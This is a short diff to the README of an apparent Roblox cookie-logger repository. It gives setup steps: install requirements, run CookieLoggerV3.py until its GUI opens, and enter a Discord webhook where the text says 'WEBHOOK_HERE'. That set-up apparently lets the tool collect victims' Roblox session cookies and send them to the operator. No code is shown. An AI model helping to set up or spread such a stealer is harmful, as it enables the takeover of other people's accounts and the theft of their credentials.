zbenntt/Roblox-Cookie-LoggerV3/README.md

 Step 2; Run the requirements file and wait until it finishes and installs all requirements

-Step 3; run the CookieLogger.exe file and wait until the gui opens
+Step 3; run the CookieLoggerV3.py file and wait until the gui opens

 Step 4; get your discord webhook and put it in the box that says WEBHOOK_HERE